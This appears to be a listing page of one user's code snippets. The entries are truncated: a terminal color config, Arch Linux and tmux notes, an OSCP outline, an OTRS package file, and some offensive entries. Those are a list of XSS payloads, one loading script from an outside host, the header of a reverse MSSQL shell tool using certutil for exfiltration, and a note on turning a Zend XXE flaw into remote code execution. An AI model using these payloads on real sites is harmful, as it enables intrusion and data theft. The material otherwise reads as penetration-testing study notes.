r3k2

# for background in 16 color terminal, valid background colors include:
# base03, bg, black, any of the non brights

# style notes:
# when bg=235, that's a highlighted message
# normal bg=233

# basic colors ---------------------------------------------------------
# color normal        brightyellow    default
color error         color196        color235                        # message line error text

r3k2

import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''

r3k2

This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt 
into a Remote Command Execution:

NOTE: It relies on the PHP expect module being loaded 
(see http://de.php.net/manual/en/book.expect.php)

joern@vbox-1:/tmp$ cat /var/www/server.php 
<?
    require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
    Zend_Loader_Autoloader::getInstance();

r3k2

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

r3k2

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

r3k2

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>

r3k2

#!/bin/sh
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'

r3k2

# OBJECTIVE:  Install Arch Linux with encrypted root and swap filesystems and boot from UEFI.

# Note:  This method supports both dedicated Arch installs and those who wish to install Arch on a multi-OS-UEFI booting system.

# The official Arch installation guide contains details that you should refer to during this installation process.
# That guide resides at:  https://wiki.archlinux.org/index.php/Installation_Guide

# Download the archlinux-*.iso image from https://www.archlinux.org/download/ and its GnuPG signature.
# Use gpg --verify to ensure your archlinux-*.iso is exactly what the Arch developers intended.  For example:

r3k2

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname

r3k2

Installing Arch:


sudo vim /etc/pacman.conf
Update packages list: sudo pacman -Syy
run sudo pacman -Syu  before installing any software (to update the repositories first)

* Timing issue:
    - Change hardware clock to use UTC time:
        sudo timedatectl set-local-rtc 0